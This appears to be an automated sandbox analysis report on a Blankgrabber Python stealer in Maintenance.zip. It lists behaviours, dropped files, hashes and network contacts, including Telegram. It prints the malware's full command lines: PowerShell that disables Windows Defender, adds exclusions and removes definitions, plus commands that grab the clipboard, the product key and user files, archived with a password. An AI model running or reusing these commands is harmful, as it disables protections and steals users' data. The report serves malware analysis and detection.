Analysis Overview
SHA256: cf428bdbd8985af9eb3e137b4dd206df0583c06a144a8252acc1979e9ccb225c
Threat Level: Known bad
The file Maintenance.zip was found to be: Known bad.
Malicious Activity Summary
Deletes Windows Defender Definitions
A stealer written in Python and packaged with Pyinstaller
Blankgrabber family
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
UPX packed file
Looks up external IP address via web service
Accesses cryptocurrency files/wallets, possible credential harvesting
Unsigned PE
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Gathers system information
Enumerates processes with tasklist
Detects videocard installed
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported: 2024-05-30 19:13
Signatures
A stealer written in Python and packaged with Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blankgrabber family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral5
Detonation Overview
Submitted: 2024-05-30 19:13
Reported: 2024-05-30 19:17
Platform: win7-20240508-en
Max time kernel: 117s
Max time network: 120s
Command Line
Signatures
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Maintenance\ste.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1716 wrote to memory of 2636 | N/A | C:\Users\Admin\AppData\Local\Temp\Maintenance\ste.exe | C:\Users\Admin\AppData\Local\Temp\Maintenance\ste.exe |
| PID 1716 wrote to memory of 2636 | N/A | C:\Users\Admin\AppData\Local\Temp\Maintenance\ste.exe | C:\Users\Admin\AppData\Local\Temp\Maintenance\ste.exe |
| PID 1716 wrote to memory of 2636 | N/A | C:\Users\Admin\AppData\Local\Temp\Maintenance\ste.exe | C:\Users\Admin\AppData\Local\Temp\Maintenance\ste.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\Maintenance\ste.exe
"C:\Users\Admin\AppData\Local\Temp\Maintenance\ste.exe"
C:\Users\Admin\AppData\Local\Temp\Maintenance\ste.exe
"C:\Users\Admin\AppData\Local\Temp\Maintenance\ste.exe"
Network
Files
C:\Users\Admin\AppData\Local\Temp\_MEI17162\python311.dll
Analysis: behavioral6
Detonation Overview
Submitted: 2024-05-30 19:13
Reported: 2024-05-30 19:17
Platform: win10-20240404-en
Max time kernel: 132s
Max time network: 138s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\_MEI39842\rar.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Maintenance\ste.exe
"C:\Users\Admin\AppData\Local\Temp\Maintenance\ste.exe"
C:\Users\Admin\AppData\Local\Temp\Maintenance\ste.exe
"C:\Users\Admin\AppData\Local\Temp\Maintenance\ste.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maintenance\ste.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maintenance\ste.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xekh2uue\xekh2uue.cmdline"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8AAC.tmp" "c:\Users\Admin\AppData\Local\Temp\xekh2uue\CSCCD4F73C5ACAD48F4AFE3FECBF2D4D04C.TMP"
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
C:\Windows\system32\getmac.exe
getmac
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI39842\rar.exe a -r -hp"Damon@123#" "C:\Users\Admin\AppData\Local\Temp\fhrnN.zip" *"
C:\Users\Admin\AppData\Local\Temp\_MEI39842\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI39842\rar.exe a -r -hp"Damon@123#" "C:\Users\Admin\AppData\Local\Temp\fhrnN.zip" *
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | 227.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 175.117.168.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\_MEI39842\python311.dll
C:\Users\Admin\AppData\Local\Temp\_MEI39842\VCRUNTIME140.dll
C:\Users\Admin\AppData\Local\Temp\_MEI39842\base_library.zip
C:\Users\Admin\AppData\Local\Temp\_MEI39842\_ctypes.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI39842\libffi-8.dll
C:\Users\Admin\AppData\Local\Temp\_MEI39842\libcrypto-1_1.dll
C:\Users\Admin\AppData\Local\Temp\_MEI39842\_ssl.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI39842\_sqlite3.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI39842\_socket.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI39842\_queue.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI39842\_lzma.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI39842\_hashlib.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI39842\_decimal.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI39842\_bz2.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI39842\unicodedata.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI39842\sqlite3.dll
C:\Users\Admin\AppData\Local\Temp\_MEI39842\select.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI39842\rarreg.key
C:\Users\Admin\AppData\Local\Temp\_MEI39842\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI39842\libssl-1_1.dll
C:\Users\Admin\AppData\Local\Temp\_MEI39842\blank.aes
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dhl00lus.bjj.ps1
\??\c:\Users\Admin\AppData\Local\Temp\xekh2uue\xekh2uue.cmdline
\??\c:\Users\Admin\AppData\Local\Temp\xekh2uue\xekh2uue.0.cs
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
\??\c:\Users\Admin\AppData\Local\Temp\xekh2uue\CSCCD4F73C5ACAD48F4AFE3FECBF2D4D04C.TMP
C:\Users\Admin\AppData\Local\Temp\RES8AAC.tmp
C:\Users\Admin\AppData\Local\Temp\xekh2uue\xekh2uue.dll
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\UnblockRepair.jpeg
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\Are.docx
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\BackupComplete.xml
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\DenyInvoke.pdf
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\Files.docx
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\FindUninstall.docx
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\Opened.docx
| MD5 | bfbc1a403197ac8cfc95638c2da2cf0e |
| SHA1 | 634658f4dd9747e87fa540f5ba47e218acfc8af2 |
| SHA256 | 272ed278e82c84cf4f80f48ec7989e1fc35f2055d6d05b63c8a31880846597a6 |
| SHA512 | b8938526fcbf7152805aec130ca553e3ec949cb825430a5d0a25c90ec5eb0863857010484a4b31fdc4bb65a4c92ad7127c812b93114be4569a677f60debe43b1 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\Recently.docx
| MD5 | 3b068f508d40eb8258ff0b0592ca1f9c |
| SHA1 | 59ac025c3256e9c6c86165082974fe791ff9833a |
| SHA256 | 07db44a8d6c3a512b15f1cb7262a2d7e4b63ced2130bc9228515431699191cc7 |
| SHA512 | e29624bc8fecb0e2a9d917642375bd97b42502e5f23812195a61a4920cae5b6ed540e74dfcf8432dcceb7de906ad0501cdd68056f9b0ec86a6bb0c1e336bfe32 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\SearchSkip.docx
| MD5 | cc5eaea31fa93bb6bf29a63a226b7f1d |
| SHA1 | 572d7e99783957d4dd980664148ea3a17d33580b |
| SHA256 | 820b99ce3547d8b1b2a9c7007650ed09b627af61af9e8f4fe625fd4244ee4f0e |
| SHA512 | 27d1cc64989b95d78a5ce4f33c55c4a87681bbb70ca25cf690661ea8755b72de92423f11df985efb094bb0e4d3158e7c0880f4082d507f8d74c8aae55915c61b |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\SendRevoke.csv
| MD5 | cb981d9101730d4fb39d9ac53cccaf6b |
| SHA1 | c665c734aa4c86644fd91db1e3c6a033c37e23b5 |
| SHA256 | 1e52e854c145f528664513605b6894acebb96eb06dc3b266b15ffa51a92250da |
| SHA512 | 3afe3b81672c939941509d6d861658ca9fbf06f14caa61cb3aa7259493b27284ded4c5df69c9d4c361d2772ab4b11d1081c4a989705584232ac4fdb183b448e9 |
memory/1888-393-0x00007FFECC660000-0x00007FFECC679000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\These.docx
| MD5 | 87cbab2a743fb7e0625cc332c9aac537 |
| SHA1 | 50f858caa7f4ac3a93cf141a5d15b4edeb447ee7 |
| SHA256 | 57e3b0d22fa619da90237d8bcf8f922b142c9f6abf47efc5a1f5b208c4d3f023 |
| SHA512 | 6b678f0dd0030806effe6825fd52a6a30b951e0c3dcf91dfd7a713d387aa8b39ec24368e9623c463360acba5e929e268f75ce996526c5d4485894b8ac6b2e0fa |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Music\BackupSelect.m1v
| MD5 | 37efa3e23251c9f3a5d59991123de46e |
| SHA1 | 8f814a4b70e8f1970756ca6e39943e24b0be7b0a |
| SHA256 | 313e4c8de7215a8e1a2d2179ac4c7fd85f37e7062c281d97f7c47943b1ddcb4b |
| SHA512 | 0a82ecdf854c1b96097dd26a044b319ed8c0b4712924eb34231408fb0754545428445eb7621fd9fcc54d97d6f46b3344b3ca17e9acd2e9ff1b4d309382d4b43f |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Pictures\BackupResize.svg
| MD5 | 2c46def812aa0261ad3b8700fa04d5e3 |
| SHA1 | 7a1efc8066a71b98e4d3d62f28225078dbb12850 |
| SHA256 | b7810e725f32307691aa72f68a3a74286b9d8da4e9f3111550838fca30c4a2e4 |
| SHA512 | 31f30d8aebe6df4ccc284b93fc05507a4556815ed285ce7e4a2746d3e35ece66aae2d6406d49feadcb67d7e137454bd1c7c99579f202756f2520a106fb3628b5 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Pictures\My Wallpaper.jpg
| MD5 | a51464e41d75b2aa2b00ca31ea2ce7eb |
| SHA1 | 5b94362ac6a23c5aba706e8bfd11a5d8bab6097d |
| SHA256 | 16d5506b6663085b1acd80644ffa5363c158e390da67ed31298b85ddf0ad353f |
| SHA512 | b2a09d52c211e7100e3e68d88c13394c64f23bf2ec3ca25b109ffb1e1a96a054f0e0d25d2f2a0c2145616eabc88c51d63023cef5faa7b49129d020f67ab0b1ff |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Pictures\WaitResolve.jpg
| MD5 | a53a7aebe55d52f57cffe57ecc51cb40 |
| SHA1 | e97109c7395fbdf33bf54a88b86f4aebff43adad |
| SHA256 | 132af49c7833421351afa568792848d07046b219e3d3a065d2c35af4786538b8 |
| SHA512 | 6f17f35df033ac9f532bf0dcc94380713df409899f279003dc780ff736a1ecde29805268dc335197eaab4aae4df8a4b552292d0b4e59603f37c25efe6566baa8 |
memory/1888-444-0x00007FFEB9310000-0x00007FFEB98F9000-memory.dmp
memory/1888-456-0x00007FFEC9720000-0x00007FFEC9734000-memory.dmp
memory/1888-459-0x00007FFEC97E0000-0x00007FFEC980E000-memory.dmp
memory/1888-455-0x00007FFEB8F90000-0x00007FFEB9305000-memory.dmp
memory/1888-454-0x00007FFEC9360000-0x00007FFEC9418000-memory.dmp
memory/1888-450-0x00007FFEC8A60000-0x00007FFEC8BD0000-memory.dmp
memory/1888-445-0x00007FFECC720000-0x00007FFECC744000-memory.dmp
memory/1888-460-0x00000191DD610000-0x00000191DD985000-memory.dmp
memory/1888-489-0x00007FFECC430000-0x00007FFECC43D000-memory.dmp
memory/1888-496-0x00007FFECC680000-0x00007FFECC6A3000-memory.dmp
memory/1888-500-0x00007FFEC97E0000-0x00007FFEC980E000-memory.dmp
memory/1888-499-0x00007FFECC440000-0x00007FFECC44D000-memory.dmp
memory/1888-498-0x00007FFECC660000-0x00007FFECC679000-memory.dmp
memory/1888-497-0x00007FFEC8A60000-0x00007FFEC8BD0000-memory.dmp
memory/1888-495-0x00007FFECC6B0000-0x00007FFECC6C9000-memory.dmp
memory/1888-494-0x00007FFECC6F0000-0x00007FFECC71D000-memory.dmp
memory/1888-493-0x00007FFECFFB0000-0x00007FFECFFBF000-memory.dmp
memory/1888-492-0x00007FFECC720000-0x00007FFECC744000-memory.dmp
memory/1888-491-0x00007FFEB9310000-0x00007FFEB98F9000-memory.dmp
memory/1888-487-0x00007FFEB8F90000-0x00007FFEB9305000-memory.dmp
memory/1888-486-0x00007FFEC9360000-0x00007FFEC9418000-memory.dmp
memory/1888-490-0x00007FFEC8940000-0x00007FFEC8A5C000-memory.dmp
memory/1888-488-0x00007FFEC9720000-0x00007FFEC9734000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-05-30 19:13
Reported
2024-05-30 19:17
Platform
win10v2004-20240508-en
Max time kernel
148s
Max time network
154s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\_MEI25282\rar.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
